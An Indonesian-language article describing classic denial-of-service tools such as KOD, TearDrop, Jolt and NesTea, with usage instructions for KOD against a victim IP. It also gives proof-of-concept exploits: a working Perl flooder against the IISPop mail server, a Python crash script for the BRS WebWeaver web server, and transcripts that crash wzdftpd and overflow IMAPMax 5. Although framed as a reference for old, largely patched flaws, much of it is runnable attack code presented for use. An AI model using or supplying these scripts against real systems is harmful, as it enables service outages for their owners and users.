Serangan Dalam Teknik Melakukan Denial of Service


Script Exploit dan tool ini telah berusia hampir 10 tahun-an, kebanyakan dari server di internet telah mem-path server mereka dari serangan exploit ini, namun tidak ada salahnya jika dituliskan kembali disini sebagai acuan atau gambaran kita untuk lebih "memperbaiki" diri dalam hal berpikir positif.

Exploit disini, adalah exploit yang menggunakan Shell linux (Unix/Comp) serta membutuhkan GCC (GNU C Compiler). Berikut type/teknis serangan DOS beserta source exploit yang digunakan.

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms. Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.

Cara penggunaan:
A. Memiliki / download file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]

Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target.

2. BOINK/BONK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan modifikasi dari bonk.c yang bisa membuat crash mesin Server NT.

3. JOLT
Jolt digunakan untuk membekukan / freeze Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet kepada ip target.

4. NesTea
NesTea bisa membuat hang (dibekukan) Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi lanjutan dari NesTea dikenal dengan NesTea2

5. NewTear
Merupakan varian dari teardrop (teardrop.c).

6. Syndrop
Merupakan serangan yang digabungkan dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows.

7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death.

Beberapa "proof of concept" dapat dipelajari melalui beberapa contoh ini:








1. Serangan kepada IISPop EMAIL Server.

Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS
Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;

}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.
2. Membunuh wzdftpd.

Sofie : wzdftpd
Vendor : http://www.wzdftpd.net/
Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host 
wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.

Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru/]
########
# Usage: ./fadvWWhtdos.py
########
import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

4. Buffer Overflow pada MailMAX 5

Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com/
BugTraqer : matrix at 0x36.org
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Refferensi:
- Tahun 2003 --> http://packetstormsecurity.nl/
- www.echo.or.id
- www.securityfocus.com

Salam Codet.